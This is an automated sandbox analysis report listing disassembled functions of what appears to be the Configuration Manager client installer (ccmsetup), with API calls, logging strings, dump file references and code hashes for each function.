                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentMutexObjectReleaseSingleThreadWait
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$Failed to remove ccmsetup service. Error 0x%x$GetServiceExecutionMutex()$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 1076790184-830140116
                                                                                          • Opcode ID: 2416f51ea4d41505d338f211d19b75531d4c6926072b15411ce4654a2b554bbe
                                                                                          • Instruction ID: 1dc33e1e10b4d1fd4369928a0b0d677b671ecca1a984be697890458a1db6f6e2
                                                                                          • Opcode Fuzzy Hash: 2416f51ea4d41505d338f211d19b75531d4c6926072b15411ce4654a2b554bbe
                                                                                          • Instruction Fuzzy Hash: 1A419E70A4525AAAEF11EB20DD4EBEDBF65BF11704F0400E8F104AB192CBB55F84DB51
                                                                                          Function 0059834E Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 96threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00598355
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005F4253: __EH_prolog3.LIBCMT ref: 005F425A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059841F
                                                                                          Strings
                                                                                          • ccmsetup.cpp, xrefs: 0059842B
                                                                                          • Logs\, xrefs: 0059839C
                                                                                          • Filesystem::Directory::RecursiveDelete(m_sDownloadDir.c_str(), saFilesToKeep), xrefs: 00598415
                                                                                          • ccmsetup.cpp, xrefs: 0059840F
                                                                                          • CcmSetup::PurgeFilesAfterUninstall, xrefs: 0059837E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0059841A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3$CurrentH_prolog3_catch_Thread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CcmSetup::PurgeFilesAfterUninstall$Filesystem::Directory::RecursiveDelete(m_sDownloadDir.c_str(), saFilesToKeep)$Logs\$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 1325713246-588032737
                                                                                          • Opcode ID: 70a7618229c3f446af0f8bb5b1eda1e24f8207836f0864e0a3cb975cb866ffbb
                                                                                          • Instruction ID: c054cac4e20df4c922d03e0a49dd21adc3b032ed37cb3ce9012547bc626d61d3
                                                                                          • Opcode Fuzzy Hash: 70a7618229c3f446af0f8bb5b1eda1e24f8207836f0864e0a3cb975cb866ffbb
                                                                                          • Instruction Fuzzy Hash: 5231A671D41289EADF11EBE4C95ABDEBFB5AF52704F148049F540672C2DBB40B04DB61
                                                                                          Function 005AA097 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 90threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005AA09E
                                                                                            • Part of subcall function 00609C7A: __EH_prolog3_catch.LIBCMT ref: 00609C81
                                                                                            • Part of subcall function 00609C7A: GetCurrentThreadId.KERNEL32 ref: 00609CF1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AA11B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AA191
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CCM::Utility::XML::Document::createNewDocument$CreateXMLDocument(&spDoc)$X:\bt\1024777\repo\src\common\inc\ccmxml.h$getPointer()->put_async(((VARIANT_BOOL)0))
                                                                                          • API String ID: 3454896115-1200307525
                                                                                          • Opcode ID: 87790bfce1d86ecc70580e270ebc42a04802f9f4ebbe1c56fa111c4644ad93fe
                                                                                          • Instruction ID: f19086c31f572ce311b7cff1c912b5e8198545285dde7eb4f88bd8ea6c648831
                                                                                          • Opcode Fuzzy Hash: 87790bfce1d86ecc70580e270ebc42a04802f9f4ebbe1c56fa111c4644ad93fe
                                                                                          • Instruction Fuzzy Hash: FC31C170981349ABDB11EFA0C91AFEEBEA5AF52710F184048F600BB2C2C7745B05C7A6
                                                                                          Function 0064A27E Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 87threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0064A285
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00640801: __EH_prolog3_catch.LIBCMT ref: 00640808
                                                                                            • Part of subcall function 00640801: GetCurrentThreadId.KERNEL32 ref: 00640858
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0064A314
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064A30F
                                                                                          • ..\lsad.cpp, xrefs: 0064A304
                                                                                          • GetStringFromColumn(&col, sDistinguishedName), xrefs: 0064A30A
                                                                                          • ..\lsad.cpp, xrefs: 0064A320
                                                                                          • CCM::LocationServices::ValidateDistinguishedName, xrefs: 0064A2AA
                                                                                          • distinguishedName, xrefs: 0064A2CB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catchH_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\lsad.cpp$..\lsad.cpp$CCM::LocationServices::ValidateDistinguishedName$GetStringFromColumn(&col, sDistinguishedName)$distinguishedName
                                                                                          • API String ID: 2064133979-2999946405
                                                                                          • Opcode ID: d5e87792c4c68cf986b5f4236fc81b55831a6c267fe791b5ac2e4a0402ee6939
                                                                                          • Instruction ID: 00dd13b4287cd2d02a9edcf467d304424b3ce4b3428ee2f22887f29c49d7a959
                                                                                          • Opcode Fuzzy Hash: d5e87792c4c68cf986b5f4236fc81b55831a6c267fe791b5ac2e4a0402ee6939
                                                                                          • Instruction Fuzzy Hash: 1031F271985288FEDF12EFF8C94AADDBF76AF15300F148069F140B7282D6749A44C722
                                                                                          Function 006113EB Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006113F2
                                                                                            • Part of subcall function 006092DC: __EH_prolog3.LIBCMT ref: 006092E3
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • SysFreeString.OLEAUT32(?), ref: 00611441
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061147C
                                                                                          Strings
                                                                                          • pEvent->GetObjectText(0, &bsObjectText), xrefs: 00611472
                                                                                          • ..\Event.cpp, xrefs: 00611488
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00611477
                                                                                          • ..\Event.cpp, xrefs: 0061146C
                                                                                          • CCM::Utility::GetObjectText, xrefs: 00611423
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3$CurrentFreeH_prolog3_catchStringThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\Event.cpp$..\Event.cpp$CCM::Utility::GetObjectText$pEvent->GetObjectText(0, &bsObjectText)
                                                                                          • API String ID: 1116191377-652805762
                                                                                          • Opcode ID: 849b78abc074aacb7542ef30f83748a16cc33020f00bfc7478698b890aeae449
                                                                                          • Instruction ID: 85bb9f4d8c37727ea0f1abad0734d183504cfd9d50c6e7a9ab90e29faafaaa9e
                                                                                          • Opcode Fuzzy Hash: 849b78abc074aacb7542ef30f83748a16cc33020f00bfc7478698b890aeae449
                                                                                          • Instruction Fuzzy Hash: CB21F670A00249ABDF01EFA4C91ABEDBEB6BF55704F184059F6017B382CB795B44CB61
                                                                                          Function 0060300F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 70threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00603016
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603073
                                                                                          • __CxxThrowException@8.LIBCMT ref: 006030EB
                                                                                          Strings
                                                                                          • ..\WmiNamespace.cpp, xrefs: 0060307B
                                                                                          • null() == false, xrefs: 00603069
                                                                                          • CCM::Utility::Wmi::Namespace::GetNamespacePath, xrefs: 0060302C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060306E
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00603063
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentException@8H_prolog3_catchThreadThrow
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\WmiNamespace.cpp$..\WmiNamespace.cpp$CCM::Utility::Wmi::Namespace::GetNamespacePath$null() == false
                                                                                          • API String ID: 3856859314-3663536092
                                                                                          • Opcode ID: 2d729ee0dce2e4892bb86cce3374ceb8fb33b1f458f0b1ca89a8d80361637bff
                                                                                          • Instruction ID: f706437249090d8cc13a6ae0e2edfd013299ca96c26991cc61193a5b2a7689a2
                                                                                          • Opcode Fuzzy Hash: 2d729ee0dce2e4892bb86cce3374ceb8fb33b1f458f0b1ca89a8d80361637bff
                                                                                          • Instruction Fuzzy Hash: 8121B7B0D8125AEACF14EFA4D849AEEBE79AF40304F04805DF50677381CB755B44CB55
                                                                                          Function 0060C04D Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 69threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0060C054
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 0060C143: __EH_prolog3_catch.LIBCMT ref: 0060C14A
                                                                                            • Part of subcall function 0060C143: GetCurrentThreadId.KERNEL32 ref: 0060C1A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060C0C4
                                                                                          • __CxxThrowException@8.LIBCMT ref: 0060C134
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060C0BF
                                                                                          • ..\WmiObject.cpp, xrefs: 0060C0B4
                                                                                          • CCM::Utility::Wmi::Object::GetString, xrefs: 0060C079
                                                                                          • ..\WmiObject.cpp, xrefs: 0060C0D0
                                                                                          • GetString(pszName, sValue), xrefs: 0060C0BA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread$Exception@8H_prolog3Throw
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\WmiObject.cpp$..\WmiObject.cpp$CCM::Utility::Wmi::Object::GetString$GetString(pszName, sValue)
                                                                                          • API String ID: 4171535811-1690715159
                                                                                          • Opcode ID: 4b4379d3925df7928e021001ac662ab7191dbe076e50f94777593ada0016420c
                                                                                          • Instruction ID: 29679478fa41a52a0f30e3b7878c28bc5567733d852ccaa941d20cc0ed093115
                                                                                          • Opcode Fuzzy Hash: 4b4379d3925df7928e021001ac662ab7191dbe076e50f94777593ada0016420c
                                                                                          • Instruction Fuzzy Hash: 5A212971EC1389EACB21EFA8890ABEEBE626F50710F048049FC45A73C2C6B40E05D791
                                                                                          Function 005FB0E2 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 56threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005FB0E9
                                                                                            • Part of subcall function 005FB1B1: __EH_prolog3_catch_GS.LIBCMT ref: 005FB1BB
                                                                                            • Part of subcall function 005FB1B1: ExpandEnvironmentStringsW.KERNEL32(%SystemRoot%\ccmsetup\ccmsetup.exe,?,00000104,CCM::Utility::GetCcmSetupDirectory), ref: 005FB218
                                                                                            • Part of subcall function 005FB1B1: GetLastError.KERNEL32 ref: 005FB226
                                                                                            • Part of subcall function 005FB1B1: GetCurrentThreadId.KERNEL32 ref: 005FB25F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FB142
                                                                                          Strings
                                                                                          • ..\util.cpp, xrefs: 005FB14E
                                                                                          • ..\util.cpp, xrefs: 005FB132
                                                                                          • cache\, xrefs: 005FB170
                                                                                          • CCM::Utility::GetCcmSetupCacheDirectory, xrefs: 005FB0F3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005FB13D
                                                                                          • GetCcmSetupDirectory(false, sCcmSetupCacheDirectory), xrefs: 005FB138
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$EnvironmentErrorExpandH_prolog3_catchH_prolog3_catch_LastStrings
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\util.cpp$..\util.cpp$CCM::Utility::GetCcmSetupCacheDirectory$GetCcmSetupDirectory(false, sCcmSetupCacheDirectory)$cache\
                                                                                          • API String ID: 249582036-2867382695
                                                                                          • Opcode ID: 77e40cef6e9df136508dabcec3eae14725a8a25026d2796e3298bdf453e16615
                                                                                          • Instruction ID: 420522e9c1ba0fbc12d360b75dd86e57d47da21b4b88cb29924fe647faa8b720
                                                                                          • Opcode Fuzzy Hash: 77e40cef6e9df136508dabcec3eae14725a8a25026d2796e3298bdf453e16615
                                                                                          • Instruction Fuzzy Hash: 591129B1B8435EE6DB12AB648D5BEBE2D257FA0B10F144104B705BB3C2CB2C1A00C7D1
                                                                                          Function 005F6218 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\String.cpp$..\String.cpp$CCM::Utility::String::toBool$false$true
                                                                                          • API String ID: 3886170330-1206052447
                                                                                          • Opcode ID: 07ee9dd877fa585a7fabe7928c934b755f16abb5ccc99baec9c41c1c0a9db964
                                                                                          • Instruction ID: c552d01cff664d5a0e4f924023583baba03f67dcdffb14b2f2ee419981a30392
                                                                                          • Opcode Fuzzy Hash: 07ee9dd877fa585a7fabe7928c934b755f16abb5ccc99baec9c41c1c0a9db964
                                                                                          • Instruction Fuzzy Hash: 0C114C6578435EAACB11A7B44D0ABBE2D51BFA1710F044045BA446B3C1DA6C8E408392
                                                                                          Function 005B4086 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 54threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005B408D
                                                                                            • Part of subcall function 005B3537: __EH_prolog3_catch_GS.LIBCMT ref: 005B3541
                                                                                            • Part of subcall function 005B3537: GetSystemTime.KERNEL32(?,CreateCCMSetupRegistryTimeStamp,00000084,005B38AF,?,CCMSetup,CreateClientInstallTimeStamp,0000002C,00579DED,00000000,00000001,00000000,00000001,00000000,00000000,?), ref: 005B359B
                                                                                            • Part of subcall function 005B3537: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,REINSTALLMODE,00000001,?,REINSTALL,00000001,?,CcmSetup::ApplyDeltaLangChanges,00000001,00000000), ref: 005B35AC
                                                                                            • Part of subcall function 005B3537: GetLastError.KERNEL32(?,?,?,?,?,REINSTALLMODE,00000001,?,REINSTALL,00000001,?,CcmSetup::ApplyDeltaLangChanges,00000001,00000000,00000001,00000000), ref: 005B35BA
                                                                                            • Part of subcall function 005B3537: GetCurrentThreadId.KERNEL32 ref: 005B35F0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B4107
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$CurrentH_prolog3_catch_SystemThread$ErrorFileLast
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CreateCCMSetupRegistryTimeStamp(L"DeploymentFinished")$CreateRebootTimeStamp$DeploymentFinished$util.cpp$util.cpp
                                                                                          • API String ID: 2792797389-3565071274
                                                                                          • Opcode ID: b5929b9226fa2b625644181b2e6a27efcd13cfd29fd0872e67a56b553893f39c
                                                                                          • Instruction ID: 05f02bda098e1ecad2bd6b4134b375f326fe86900011060fea2125975f25accf
                                                                                          • Opcode Fuzzy Hash: b5929b9226fa2b625644181b2e6a27efcd13cfd29fd0872e67a56b553893f39c
                                                                                          • Instruction Fuzzy Hash: 3611A031E85389EADB21E7B8CD4ABDE6E666F64B00F198046F640773C2CBB45A04C761
                                                                                          Function 005BB3FC Relevance: 13.6, APIs: 9, Instructions: 65COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetSecurityDescriptorOwner.ADVAPI32(?,00000000,?,00000000,?,005B1CD2,?,00000002), ref: 005BB40B
                                                                                          • GetLastError.KERNEL32(?,00000000,?,00000000,?,005B1CD2,?,00000002), ref: 005BB415
                                                                                          • _free.LIBCMT ref: 005BB431
                                                                                          • GetLengthSid.ADVAPI32(00000002,?,?,00000000,?,00000000,?,005B1CD2,?,00000002), ref: 005BB443
                                                                                          • _malloc.LIBCMT ref: 005BB44D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: DescriptorErrorLastLengthOwnerSecurity_free_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 71172703-0
                                                                                          • Opcode ID: 67ed2f6a1de171f36687c332c70d4ca2d33406f8841fbb3f750235f8549f2979
                                                                                          • Instruction ID: ece87d138aefb2524858892deb17719663f088920d5f17c2ef7c4fa69d925ec6
                                                                                          • Opcode Fuzzy Hash: 67ed2f6a1de171f36687c332c70d4ca2d33406f8841fbb3f750235f8549f2979
                                                                                          • Instruction Fuzzy Hash: F5116375500512BFEB105F75DC087A6BF9AFF44761F108126F909C6520E7B6E820D7A0
                                                                                          Function 0061E09B Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 167COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0061E0A2
                                                                                            • Part of subcall function 00609791: __EH_prolog3.LIBCMT ref: 00609798
